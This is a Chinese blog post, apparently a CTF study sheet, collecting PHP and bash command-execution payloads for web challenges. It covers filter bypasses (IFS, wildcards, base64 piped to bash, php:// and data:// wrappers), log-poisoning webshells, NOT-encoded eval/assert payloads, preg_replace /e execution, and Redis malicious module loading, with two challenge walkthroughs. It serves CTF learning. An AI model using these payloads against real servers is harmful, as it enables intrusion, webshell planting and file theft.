<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="userq"><meta name="renderer" content="webkit"><meta name="copyright" content="userq"><meta name="keywords" content="MyBlog"><meta name="description" content="MyBlog"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>命令执行相关知识点解释 · Mr.cheng's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="MyBlog" type="application/atom+xml">
</head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/cat.png"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">userq</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//1768161086.github.io/" target="_black">friendA</a></span><span><a href="//github.com/" target="_black">friendB</a></span><span><a href="//github.com/" target="_black">friendC</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Mr.cheng's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">命令执行相关知识点解释</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-01-20</span></span><span class="post-intro-tags"><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="web"> web</a><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="http"> http</a><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="命令执行"> 命令执行</a></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><blockquote>
<p>ctf中命令执行相关知识点总结</p>
</blockquote>
<span id="more"></span>

<h1 id="1-过滤空格"><a href="#1-过滤空格" class="headerlink" title="1.过滤空格"></a>1.过滤空格</h1><p>可以用%09、%0a、${IFS}、$IFS$9 、%20、重定向符&lt;&gt;</p>
<h1 id="2-过滤关键字-cat、flag等"><a href="#2-过滤关键字-cat、flag等" class="headerlink" title="2.过滤关键字(cat、flag等)"></a>2.过滤关键字(cat、flag等)</h1><p>(1)过滤的字符串中加入单引号、双引号或反斜杠（ca’’t、ca””t、ca\t）&#x2F;nl</p>
<p>(2)$(print”\x6c\x73”)&#x3D;&#x3D;ls;利用printf+16进制输出ls,用括号外输出ls,等用于反斜杠<code>printf&quot;\x6c\x73&quot;</code>;</p>
<p>(3)echo “Y2F0IGZsYWc&#x3D;”|base64 -d|bash利用base64绕过；</p>
<p>(4)利用通配符：*&#x2F;?</p>
<p>(5)利用为协议：c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain或c&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</p>
<p>(6)为协议+base64绕过：?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4&#x3D;</p>
<h2 id="相关命令："><a href="#相关命令：" class="headerlink" title="相关命令："></a>相关命令：</h2><p>1.?c&#x3D;system(“tac%20fla*”);<br>2.?c&#x3D;echo%20<code>tac%20fla*</code>;<br>3.<code>?c=eval($_GET[1]);&amp;1=phpinfo();</code><br>4.?c&#x3D;system(“cp%20fl<em>g.php%20a.txt%20”);<br>5.<code>?c=include$_GET[1]?&gt;&amp;1=php://filter/read=convert.base64-encode/resource=flag.php </code><br>6.<code>?c=include&quot;$_GET[a]&quot;?&gt;&amp;a=/var/log/nginx/access.log是nginx默认的access日志路径，访问该路径时，在User-Agent中写入一句话木马，然后用中国蚁剑连接即可</code><br>7.?c&#x3D;include$_GET[v]?&gt;&amp;v&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<code>&lt;?php system(&quot;tac flag.php&quot;)?&gt;</code><br>8.?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4&#x3D;<br>9.?c&#x3D;eval(array_pop(next(get_defined_vars())));需要POST传入参数为1&#x3D;system(‘tac fl</em>‘);<br>10.?c&#x3D;show_source(next(array_reverse(scandir(pos(localeconv()))))); 或者 c&#x3D;show_source(next(array_reverse(scandir(getcwd()))));<br>11.?c&#x3D;echo highlight_file(next(array_reverse(scandir(pos(localeconv())))));<br>12.?c&#x3D;eval(next(reset(get_defined_vars())));&amp;1&#x3D;;system(“tac%20flag.php”);<br>13.system(“find &#x2F; -name flag”)：查找所有文件名匹配flag的文件</p>
<h1 id="3-过滤-c-a-t"><a href="#3-过滤-c-a-t" class="headerlink" title="3.过滤*c *a *t"></a>3.过滤*<em>c</em> *<em>a</em> *t</h1><p>利用c&#x3D;grep${IFS}show${IFS}fl?g.php或者c&#x3D;mv${IFS}fl?g.php${IFS}a.txt</p>
<p>grep命令是文本搜索命令并用show返回</p>
<p>mv命令的意图是将文件 <code>fl?g.php</code> 重命名为 <code>a.txt</code>。</p>
<h1 id="4-过滤字母-a-z"><a href="#4-过滤字母-a-z" class="headerlink" title="4.过滤字母[a-z]"></a>4.过滤字母[a-z]</h1><p>?c&#x3D;&#x2F;???&#x2F;????64 ????.???也就是?c&#x3D;&#x2F;bin&#x2F;base64 flag.php</p>
<h1 id="5-过滤字母数字空格"><a href="#5-过滤字母数字空格" class="headerlink" title="5.过滤字母数字空格"></a>5.过滤字母数字空格</h1><p>写一个上传文件的脚本后抓包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;http://xxx.ctf.show/&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;file&quot; name=&quot;file&quot; id=&quot;file&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>传入?c&#x3D;.%20&#x2F;???&#x2F;????????[@-[] 等效 &#x2F;tmp&#x2F;phpxxxxxx</p>
<p>文件内容为:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">cat flag.php</span><br><span class="line">或者：cat /var/www/html/flag.php</span><br></pre></td></tr></table></figure>

<h3 id="web57-取反"><a href="#web57-取反" class="headerlink" title="web57($(())取反):"></a>web57($(())取反):</h3><p>?c&#x3D;(())取反):?c&#x3D;$((<del>$(((((((($((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))(())))(())))(())))$((<del>$(())))(())))(())))(())))$((</del>$(())))))))</p>
<h1 id="6-过滤system"><a href="#6-过滤system" class="headerlink" title="6.过滤system"></a>6.过滤system</h1><p>show_source(‘’);或者highlight_file(‘flag.php’);或readgzfile(“&#x2F;flag.txt”);或include或require或c&#x3D;include($_POST[‘w’]);&amp;w&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;&#x2F;flag.txt</p>
<h1 id="7-查看当前目录"><a href="#7-查看当前目录" class="headerlink" title="7.查看当前目录"></a>7.查看当前目录</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">查看当前目录整体地址：</span><br><span class="line">c=print_r(scandir(&#x27;./&#x27;));</span><br><span class="line">c=var_dump(scandir(&#x27;./&#x27;));</span><br><span class="line">c=print_r(scandir(dirname(&#x27;__FILE__&#x27;)));</span><br><span class="line">c=print_r(scandir(current(localeconv())));</span><br><span class="line">c=$a=opendir(&quot;./&quot;); while (($file = readdir($a)) !== false)&#123;echo $file . &quot;&lt;br&gt;&quot;; &#125;;</span><br><span class="line"></span><br><span class="line">查看根目录：</span><br><span class="line">c=print_r(scandir(&quot;/&quot;));</span><br><span class="line">c=var_dump(scandir(&#x27;/&#x27;));</span><br><span class="line">c=var_export(scandir(&#x27;/&#x27;));</span><br><span class="line">c=$a=new DirectoryIterator(&#x27;glob:///*&#x27;);foreach($a as $f)&#123;echo($f-&gt;__toString().&quot; &quot;);&#125;</span><br><span class="line"></span><br><span class="line">通过单一函数读取文件：</span><br><span class="line">c=show_source(&#x27;flag.php&#x27;);</span><br><span class="line">c=echo file_get_contents(&quot;flag.php&quot;);    // 这个要看源代码</span><br><span class="line">c=readfile(&quot;flag.php&quot;);                // 这个要看源代码</span><br><span class="line">c=var_dump(file(&#x27;flag.php&#x27;));</span><br><span class="line">c=print_r(file(&#x27;flag.php&#x27;));           // file函数表示把整个文件读入一个数组中</span><br><span class="line">c=highlight_file(next(array_reverse(scandir(current(localeconv())))));</span><br><span class="line">c=include(&#x27;/flag.txt&#x27;);</span><br><span class="line">一些好用的payload</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);while (!feof($a)) &#123;$line = fgets($a);echo $line;&#125;  //源代码</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);while (!feof($a)) &#123;$line = fgetc($a);echo $line;&#125;  //源代码</span><br><span class="line">c=$a=fopen(&quot;flag.php&quot;,&quot;r&quot;);while (!feof($a)) &#123;$line = fgetcsv($a);var_dump($line);&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>c&#x3D;print_r(scandir或glob(“&#x2F;“));或var_dump(scandir(“&#x2F;“));或var_export(scandir(“&#x2F;“));或</p>
<p>$a &#x3D; new DirectoryIterator(“glob:&#x2F;&#x2F;&#x2F;*”); &#x2F;&#x2F; 创建一个DirectoryIterator对象，遍历根目录<br>foreach ($a as $f) { &#x2F;&#x2F; 遍历每个条目;echo($f-&gt;__toString() . ‘ ‘); &#x2F;&#x2F; 输出条目的名称，并添加一个空格};exit(0); &#x2F;&#x2F; 终止脚本执行</p>
<h1 id="8-字母-数字别替成？"><a href="#8-字母-数字别替成？" class="headerlink" title="8.字母&#x2F;数字别替成？"></a>8.字母&#x2F;数字别替成？</h1><p>1.命令后+ob_flush();或ob_end_flush();或exit();或die();</p>
<p>eg:c&#x3D;include(“&#x2F;flag.txt”);exit();</p>
<p> 2.scandir() 函数来扫描根目录，但由于 open_basedir 限制，这个操作会被禁止</p>
<p>使用 glob:&#x2F;&#x2F; 伪协议绕过 open_basedir，读取根目录下的文件，payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">c=?&gt;&lt;?php $a=new DirectoryIterator(&quot;glob:///*&quot;); // 创建一个DirectoryIterator对象，遍历根目录</span><br><span class="line">foreach($a as $f) // 遍历每个条目</span><br><span class="line">&#123;</span><br><span class="line">   echo($f-&gt;__toString().&#x27; &#x27;);   // 输出条目的名称，并添加一个空格</span><br><span class="line">&#125;</span><br><span class="line">exit(0);  // 终止脚本执行</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>3.echo 输出指定数组索引的文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c=echo(scandir(&quot;/&quot;)[6]);exit();</span><br></pre></td></tr></table></figure>



<h1 id="9-e模式下的漏洞"><a href="#9-e模式下的漏洞" class="headerlink" title="9.e模式下的漏洞"></a>9.e模式下的漏洞</h1><p>e模式下的preg_replace可以让第二个参数‘替换字符串’当作代码执行，但是这里第二个参数是不可变的。<br>但因为有这种特殊的情况，正则表达式模式或部分模式两边添加圆括号会将相关匹配存储到一个临时缓存区，并且从1开始排序。<br>而strtolower(“\1”)正好表达的就是匹配区的第一个（\1&#x3D;\1），从而我们如果匹配可以，则可以将函数实现。 比如我们传入 ?.*&#x3D;{${phpinfo()}}</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">preg_replace(&#x27;/(&#x27; . $re . &#x27;)/ei&#x27;,&#x27;strtolower(&quot;\\1&quot;)&#x27;,$str);    // 原句</span><br><span class="line">preg_replace(&#x27;/(&#x27; .* &#x27;)/ei&#x27;,&#x27;strtolower(&quot;\\1&quot;)&#x27;,&#123;$&#123;phpinfo()&#125;&#125;);// 输入后</span><br></pre></td></tr></table></figure>

<p>又因为$_GET传入首字母是非法字符时候会把 .（点号）改成下划线，因此得将.换成\s</p>
<p>正则表达式\S：匹配非空字符</p>
<h2 id="例：XYCTF2024-warm-up"><a href="#例：XYCTF2024-warm-up" class="headerlink" title="例：XYCTF2024 warm up"></a>例：XYCTF2024 warm up</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">if (isset($_POST[&#x27;a&#x27;]) &amp;&amp; !preg_match(&#x27;/[0-9]/&#x27;, $_POST[&#x27;a&#x27;]) &amp;&amp; intval($_POST[&#x27;a&#x27;])) &#123;</span><br><span class="line">    echo &quot;操作你O.o&quot;;</span><br><span class="line">    echo preg_replace($_GET[&#x27;a&#x27;],$_GET[&#x27;b&#x27;],$_GET[&#x27;c&#x27;]);  // 我可不会像别人一样设置10来个level</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    die(&quot;有点汗流浃背&quot;);</span><br><span class="line">&#125;  </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?a=/1/ei&amp;b=system(&#x27;tac /f*&#x27;)&amp;c=1</span><br><span class="line">a[]=1</span><br></pre></td></tr></table></figure>

<p>preg_replace命令执行</p>
<h1 id="补充：-被过滤："><a href="#补充：-被过滤：" class="headerlink" title="补充：;被过滤："></a>补充：;被过滤：</h1><p>使用” || “ “ &amp; “ “ &amp;&amp; “ 分隔 &#x2F;dev&#x2F;null 2&gt;&amp;1 意思是将标准输出和标准错误都重定向到 &#x2F;dev&#x2F;null 即不回显 ; &#x2F;&#x2F;分号 | &#x2F;&#x2F;只执行后面那条命令 || &#x2F;&#x2F;只执行前面那条命令 &amp; &#x2F;&#x2F;两条命令都会执行 &amp;&amp; &#x2F;&#x2F;两条命令都会执行</p>
<p>Linux 内置变量与 Bash 切片的命令执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$PWD和$&#123;PWD&#125;    表示当前所在的目录    /var/www/html</span><br><span class="line">$&#123;#PWD&#125;         13        前面加个#表示当前目录字符串长度</span><br><span class="line">$&#123;PWD:3&#125;        r/www/html    代表从第几位开始截取到后面的所有字符（从零开始）</span><br><span class="line">$&#123;PWD:~3&#125;        html    代表从最后面开始向前截取几位（从零开始）</span><br><span class="line">$&#123;PWD:3:1&#125;         r</span><br><span class="line">$&#123;PWD:~3:1&#125;     h</span><br><span class="line">$&#123;PWD:~A&#125;        l    这里的A其实就是表示1</span><br><span class="line">$&#123;SHLVL:~A&#125;     1    代表数字1</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">code=$&#123;PATH:~A&#125;$&#123;PWD:~A&#125; ????.???</span><br><span class="line"># nl flag.php</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$&#123;PWD:$&#123;#&#125;:$&#123;#SHLVL&#125;&#125;???$&#123;PWD:$&#123;#&#125;:$&#123;#SHLVL&#125;&#125;??$&#123;HOME:$&#123;#HOSTNAME&#125;:$&#123;#SHLVL&#125;&#125; ????.???</span><br><span class="line"></span><br><span class="line">就是/???/??t ????.???</span><br><span class="line"></span><br><span class="line">就是/bin/cat flag.php</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">code=$&#123;PWD::$&#123;#SHLVL&#125;&#125;???$&#123;PWD::$&#123;#SHLVL&#125;&#125;?????$&#123;#RANDOM&#125;$&#123;IFS&#125;????.???</span><br><span class="line">/bin/base64 flag.php            这里其实$&#123;IFS&#125;可以不用直接用空格，因为没禁</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">过滤$&#123;#SHLVL&#125;可以用$&#123;##&#125;、$&#123;#?&#125;</span><br><span class="line">$&#123;PWD::$&#123;##&#125;&#125;???$&#123;PWD::$&#123;##&#125;&#125;??$&#123;PWD:$&#123;##&#125;:$&#123;##&#125;&#125; ????.???</span><br><span class="line"></span><br><span class="line">就是/???/??v ????.???</span><br><span class="line"></span><br><span class="line">就是/bin/rev flag.php</span><br><span class="line"></span><br><span class="line">$&#123;PWD::$&#123;##&#125;&#125;???$&#123;PWD::$&#123;##&#125;&#125;?????$&#123;#RANDOM&#125; ????.???</span><br><span class="line"></span><br><span class="line">就是/???/?????4 ????.???</span><br><span class="line"></span><br><span class="line">就是/bin/base64 flag.php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="1-闭合可以用system-ls-绕过"><a href="#1-闭合可以用system-ls-绕过" class="headerlink" title="1.?&gt;闭合可以用system(&#39;ls /&#39;);绕过"></a>1.?&gt;闭合可以用<script language="php">system(&#39;ls /&#39;);</script>绕过</h2><p><code>eval(&quot;?&gt;&quot;. $word);</code></p>
<h4 id="2-redis加载恶意so文件"><a href="#2-redis加载恶意so文件" class="headerlink" title="2.redis加载恶意so文件"></a>2.redis加载恶意so文件</h4><p>加载命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">MODULE LOAD &quot;/var/www/html&quot;</span><br><span class="line">system.exec &quot;whoami&quot;</span><br></pre></td></tr></table></figure>

<h2 id="3-if-preg-match-A-Za-z0-9-code"><a href="#3-if-preg-match-A-Za-z0-9-code" class="headerlink" title="3.if(preg_match(&quot;/[A-Za-z0-9]+/&quot;,$code)){"></a>3.<code>if(preg_match(&quot;/[A-Za-z0-9]+/&quot;,$code))&#123;</code></h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">error_reporting(0);</span><br><span class="line">$a=&#x27;assert&#x27;;</span><br><span class="line">$b=urlencode(~$a);</span><br><span class="line">echo $b;</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">$c=&#x27;(eval($_POST[test]))&#x27;;</span><br><span class="line">$d=urlencode(~$c);</span><br><span class="line">echo $d;</span><br><span class="line"> ?&gt;</span><br></pre></td></tr></table></figure>

<p>使用php脚本获取url编码取反</p>
<p>上传payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);</span><br></pre></td></tr></table></figure>

<p>一句话木马链接后用绕过disable_function插件获取flag：&#x2F;readflag</p>
<h2 id="10-Basectf-1z-php-echo-new-a-b-c"><a href="#10-Basectf-1z-php-echo-new-a-b-c" class="headerlink" title="10.Basectf 1z_php  echo (new $a($b))-&gt;$c();"></a>10.Basectf 1z_php  <code>echo (new $a($b))-&gt;$c();</code></h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(&#x27;index.php&#x27;);</span><br><span class="line"># 我记得她...好像叫flag.php吧？</span><br><span class="line">$emp=$_GET[&#x27;e_m.p&#x27;];</span><br><span class="line">$try=$_POST[&#x27;try&#x27;];</span><br><span class="line">if($emp!=&quot;114514&quot;&amp;&amp;intval($emp,0)===114514)</span><br><span class="line">&#123;</span><br><span class="line">    for ($i=0;$i&lt;strlen($emp);$i++)&#123;</span><br><span class="line">        if (ctype_alpha($emp[$i]))&#123;</span><br><span class="line">            die(&quot;你不是hacker？那请去外场等候！&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    echo &quot;只有真正的hacker才能拿到flag！&quot;.&quot;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">    if (preg_match(&#x27;/.+?HACKER/is&#x27;,$try))&#123;</span><br><span class="line">        die(&quot;你是hacker还敢自报家门呢？&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if (!stripos($try,&#x27;HACKER&#x27;) === TRUE)&#123;</span><br><span class="line">        die(&quot;你连自己是hacker都不承认，还想要flag呢？&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $a=$_GET[&#x27;a&#x27;];</span><br><span class="line">    $b=$_GET[&#x27;b&#x27;];</span><br><span class="line">    $c=$_GET[&#x27;c&#x27;];</span><br><span class="line">    if(stripos($b,&#x27;php&#x27;)!==0)&#123;</span><br><span class="line">        die(&quot;收手吧hacker，你得不到flag的！&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    echo (new $a($b))-&gt;$c();</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    die(&quot;114514到底是啥意思嘞？。？&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>第一层：参数构造和上面某题一样，传参带上小数即可绕过</p>
<p>第二层：回溯次数绕过，超过preg_match所能匹配的极限</p>
<p>第三层：原生类利用+php伪协议绕过</p>
<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?e[m.p=114514.2&amp;a=SplFileObject&amp;b=php://filter/read=convert.base64-encode/resource=flag.php&amp;c=fgets</span><br></pre></td></tr></table></figure>

<p>2.post利用回溯次数绕过即可，代码生成如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">try = &#x27;a&#x27;*100000000 + &#x27;HACKER&#x27;</span><br><span class="line">print(try)</span><br></pre></td></tr></table></figure>

<p>3.或者直接构造脚本：</p>
